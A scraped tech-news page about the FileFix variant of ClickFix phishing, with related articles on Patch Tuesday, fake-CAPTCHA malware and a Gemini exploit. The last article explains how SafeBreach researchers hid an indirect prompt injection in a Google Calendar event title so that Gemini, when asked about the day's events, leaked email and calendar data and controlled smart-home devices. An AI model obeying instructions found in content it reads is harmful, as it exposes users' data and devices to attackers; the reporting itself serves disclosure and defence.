New FileFix attack brings ClickFix social engineering to Windows File Explorer — how to stay safe
For those unfamiliar with ClickFix, it tricks users into executing malicious commands by convincing them that they need to 'fix' something in order to complete a task on their machines.
As reported by BleepingComputer, this new FileFix method uses the Windows File Explorer address bar instead. Mr.d0x not only discovered the new method but has demonstrated that it can be used in attacks to target company employees via the same social engineering techniques that have proven highly successful with ClickFix.
ClickFix attacks, which have surged in popularity recently, are browser-based and use a variety of tactics to get victims to click on a button in their browser that will copy a command to their Windows clipboard. The victim is then told to paste the command into PowerShell or prompted to perform an additional command in order to 'fix' the issue.
This is frequently seen as a reCAPTCHA or an error that needs to be corrected via the Win+R Run Dialog. It has proven to be an extremely effective malware tool, used to spread dangerous infostealers and launch ransomware attacks.
The FileFix update created by mr.d0x is similar to a typical ClickFix attack but pastes the command into Windows File Explorer, which many users are more comfortable using. File Explorer can also execute operating system commands which means it has a functional upload feature; the 'trick' portion of the attack is that it no longer requires an error or an issue as a lure and may simply appear as a notification for a shared file that the user needs to locate through File Explorer.
FileFix is a phishing page that includes an 'Open Fixe Explorer' button that will launch File Explorer through the file upload functionality and copy the PowerShell command to the clipboard. The fake path is initially seen in the Fixe Explorer address bar, which hides the malicious command and then executes it.
Get instant access to breaking news, the hottest reviews, great deals and helpful tips.
The ClickFix tactic that's currently being used in more and more in attacks is working due to the fact that it's able to bypass the best antivirus software and many other security tools. The reason for this is that victims end up doing most of the heavy lifting themselves as the hackers behind this and similar campaigns use social engineering to coerce them into taking action.
The hackers behind this and similar campaigns use your preexisting knowledge and online habits to get you to do something you otherwise normally wouldn't. They might also use a sense of urgency to get you to visit one of the malicious sites used in this campaign.
If you do see a verification pop-up with instructions, close the website immediately and whatever you do, don't interact with it or follow its instructions.
Being asked to open a Terminal or Command Prompt window on your computer is a major red flag. However, not everyone is as tech savvy which is why you should share what you've learned with both older and younger family members, friends and colleagues to help keep them safe, too.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Tom's Guide
3 hours ago
- Tom's Guide
Microsoft just fixed over 107 flaws including one serious zero-day — update your PC right now
Yesterday was Microsoft's August 2025 Patch Tuesday, and it was a busy one: The company issued patches for 107 total vulnerabilities including one zero-day flaw for an exploit in Windows Kerberos. Bleeping Computer reports that of the total flaws that were fixed, thirteen were rated critical. Of those thirteen critical flaws, nine were remote code execution style vulnerabilities, three were information disclosure attacks and one was an elevation of privilege. The style of bugs from the total number of vulnerabilities breaks down to: The zero-day vulnerability (tracked as CVE-2025-53779)is a Windows Kerberos Elevation of Privilege Vulnerability. It's a flaw in Kerberos that would permit authenticated hackers to have domain administrator privileges over a network. However, according to Microsoft, the attacker would require elevated access to two dMSA attributes in order to exploit the vulnerability. The two attributes are msds-groupMSAMembership, which would allow the user to utilize the dMSA and msds-ManagedAccountPreceededByLink, where the attacker needs write access to the attribute which allows them to specify a user that the dMSA can act on behalf of. Microsoft has attributed the discovery of the flaw to Yuval Gordon of Akamai who published a technical report on the flaw in May. Follow Tom's Guide on Google News to get our up-to-date news, how-tos, and reviews in your feeds. Make sure to click the Follow button. Get instant access to breaking news, the hottest reviews, great deals and helpful tips.
Fox News
a day ago
- Fox News
CAPTCHAgeddon signals a dangerous shift
What looks like a simple "Are you human?" check is now one of the most dangerous tricks on the internet. Fake captchas have evolved into full-blown malware launchpads, thanks to a sneaky new method called ClickFix. It copies commands to your clipboard and tricks you into running them, without ever downloading a file. This shift in attack tactics is so big that researchers are calling it "CAPTCHAgeddon." It's not just a new scam. It's a viral malware delivery system that's more convincing, stealthy, and widespread than anything before it. Let's break down how this new wave of attacks works and what makes it so hard to stop. Sign up for my FREE CyberGuy ReportGet my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you'll get instant access to my Ultimate Scam Survival Guide - free when you join my Back in 2024, security experts warned about fake browser update pop-ups. Victims were told to download files that turned out to be malware. But those tricks are now outdated. Enter ClickFix. Instead of asking users to install something, ClickFix loads a fake CAPTCHA screen. It looks legit, just like Google reCAPTCHA or Cloudflare's bot checks. But when you click "verify," it secretly copies a malicious PowerShell or shell script to your clipboard. From there, you're just one paste away from installing malware that steals your accounts, passwords, and files. This new trick is more convincing than any old download prompt. And it's spreading like wildfire. Fake captchas didn't stay in sketchy ad pop-ups for long. Attackers realized they could hide these tricks in places people already trust: Each attack blends into the site or service it mimics. Some CAPTCHAS even display site logos, making the trick look like it came from the page itself. This isn't a spray-and-pray scheme anymore. It's targeted social engineering wrapped in sleek design. These aren't low-effort scams. Attackers constantly evolve their tactics to avoid detection. Here's what makes this malware so stealthy: Attackers also serve the payloads through trusted-looking domains and even legitimate-looking JavaScript libraries. Security researchers at Guardio didn't just look at one attack. They analyzed thousands. By clustering command structures, domains, and payload patterns, they identified multiple threat actors using similar tactics, each with a slightly different twist. Some groups use heavily obfuscated code. Others go for speed with clean, readable scripts. But all of them rely on the same core trick: fooling you into clicking something that seems harmless. These new ClickFix scams are stealthy, convincing, and hard to detect, but you can stay safe with the right habits and tools. Here's what to do immediately: Always run the latest version of your browser and operating system. Updates patch security holes that attackers exploit. Also, use a strong antivirus software and keep it updated. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android & iOS devices at If a site asks you to paste a command into your terminal or browser console, stop. That's the main delivery method for ClickFix malware. Legitimate services will never ask you to do this. Phishing campaigns are hiding fake CAPTCHAs in legit-looking URLs on Reddit, GitHub, and even news sites. Always hover over links before clicking and double-check the domain, especially if prompted to "verify you're human." These attacks often target users whose emails or personal details are already circulating online. These services can reduce your digital footprint by requesting removal from data broker sites. While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren't cheap - and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It's what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you. Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting a free scan to find out if your personal information is already out on the web: Modern browsers like Brave, Chrome, Firefox, Safari, and Opera offer real-time protection that blocks malicious websites, including fake CAPTCHA pages. Microsoft Edge also includes strong phishing defenses through its SmartScreen filter. Make sure features like Enhanced Safe Browsing or SmartScreen are turned on. These tools detect threats before you click, giving you a critical layer of defense. Password managers don't just store your logins; they can also alert you when a site looks suspicious. If your manager won't autofill a password on a CAPTCHA screen or login page, that's a red flag. It usually means the site isn't recognized as legitimate. This small moment of hesitation can help you avoid falling for a scam. Check out the best expert-reviewed password managers of 2025 at If you land on a shady CAPTCHA page, don't just close the tab; report it. Most browsers have a "Report a security issue" option, or you can use Google Safe Browsing ( Flagging malicious pages helps stop the scam from spreading and protects others from falling victim to the same trap. Most people don't know about these clipboard-based attacks. Share this article and talk about it. Raising awareness can stop the scam from spreading. CAPTCHAgeddon marks a turning point. Malware isn't just hiding in shady downloads anymore. It's hiding in plain sight, on familiar websites, in trusted apps, and inside the buttons you click every day. This trend replaces the fake browser update scam entirely. It's smarter, faster, and harder to detect. And unless we understand how it spreads, it will only grow. Security now means thinking twice about the everyday. Even a CAPTCHA. Have you ever encountered a suspicious CAPTCHA or a strange prompt online? What tipped you off, or did you almost fall for it? Let us know by writing to us at Sign up for my FREE CyberGuy ReportGet my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you'll get instant access to my Ultimate Scam Survival Guide - free when you join my Copyright 2025 All rights reserved.
Tom's Guide
2 days ago
- Tom's Guide
Google Calendar bug uses Gemini to take over smart home devices and steal user data
Researchers have found a flaw that allows malicious Google Calendar invites to hijack Gemini in order to wreak havoc on a target's machine. As reported by Bleeping Computer, a maliciously crafted invite within Google Calendar can remotely take over Gemini agents without any user involvement beyond typical day-to-day interaction with the assistant. The security researchers at SafeBreach, who demonstrated this attack in a report, were able to send a calendar invite with an embedded prompt injection, hidden in the event title, which permitted them to exfiltrate a variety of user data like email content and Calendar information. They were also able to track the victim's location, control smart home devices (using Google Home) open apps on Android and trigger Zoom calls. The researchers made note that the attack did not require white-box model access and was not blocked by Gemini's protection measures or by prompt filtering. Instead, the attack begins with a malicious Google Calendar event invite sent to the victim which includes an event title containing an indirect prompt injection. The victim then only needs to interact with Gemini as they typically would, such as asking 'What are my calendar events today?' in order to cause the AI chatbot to pull a list of events from the Calendar – which will include the malicious event title embedded by the attacker. This will then becomes part of Gemini's content window, and the assistant will treat it as part of the conversation as it is unable to realize that the instruction is malicious. Depending on what the instruction is, it could cause lead to a number of different prompts from being executed, causing events in Google Calendar to be edited or removed entirely, opening URLs to retrieve the victim's IP address, joining a Zoom call, using Google Home to control devices, or accessing emails and leaking user data. However, it could take up to six calendar invites for this attack to work with the malicious prompt being included only in the last invite. This is because the Calendar events section displays only the five most recent events; the rest fall under the 'Show more' button. Gemini will parse them all – including the malicious one – when instructed to. Additionally, the victim will not see the malicious event title or realize there has been a compromise unless they expand the events list by clicking 'Show more.' Gemini, Google's LLM (large language model) assistant, is integrated into Android, Google web services and Google's Workspace apps so it has access to Gmail, Calendar and Google Home. These attacks are a downside of Google's broad access and reach, and while its usefulness comes from its ability to reach across tools, this is also proving to be a detriment when it comes to the nature of this attack. Google has already issued a fix and has credited the team of researchers and their efforts. Get instant access to breaking news, the hottest reviews, great deals and helpful tips. Follow Tom's Guide on Google News to get our up-to-date news, how-tos, and reviews in your feeds. Make sure to click the Follow button.
